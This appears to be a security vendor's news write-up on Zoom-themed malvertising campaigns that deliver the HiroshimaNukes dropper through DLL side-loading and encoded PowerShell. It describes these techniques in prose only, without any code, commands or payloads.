While Zoom is used by millions of people around the world, these campaigns are likely targeting victims who are into cryptocurrencies as well as corporate users, in order to gain access to company networks.
The threat actors are using a number of fake identities to create multiple advertiser accounts.
While we don't know how many people may have fallen for these Zoom malvertising campaigns, we can say that the number of ads and their positioning was prominent enough to generate a substantial amount of traffic.
The threat actors are using tracking templates to cloak the redirection mechanism to either the legitimate Zoom website or a site or their choosing.
HiroshimaNukes is a name given by its author to a piece of malware that was new to us.
Its goal is to drop additional malware, typically a stealer followed by data exfiltration.
DLL side-loading is a technique used by threat actors to bypass detection.
While DLL side-loading is commonly used by malware authors, it is also a unique TTP that we don't see in all malvertising campaigns.
We were able to search for previous similar attacks from the same threat actor.
The threat actors are tracking victims from their campaigns using a control panel called Hunting panel 1.40 which was new to us.
Malware payload. The malicious installer contains several files but the malicious components reside in the PowerShell scripts.
This technique has been used by the threat actor for months already, probably because they get higher infection rates than with a traditional malware binary.
The Base64-encoded PowerShell reveals the malware's command and control server as well as a number of other commands such as reporting telemetry back about the machine and any security software installed, and more importantly a GPG encrypted payload decoded on the fly.
We surmise this is a way for the threat actor to track their malvertising and payload delivery campaigns.
The panel's background image is from the Firewatch video game.
Malvertising continues to be a privileged malware delivery vector where threat actors are able to bypass ad verification checks, and often times security solutions as well.
We are actively tracking and reporting each new malvertising campaign we come across.
As we can't always control when third parties will take action on malicious ads, our top priority is to ensure our customers remain protected by blocking new malware domains and samples.
Both our consumer and enterprise users are protected agains these threats.
We would like to thank Sergei Frankoff, malware researcher and a co-founder of Open Analysis, for his help with the HiroshimaNukes dropper.
This Cyber News was published on www.malwarebytes.com. Publication date: Wed, 13 Dec 2023 17:13:04 +0000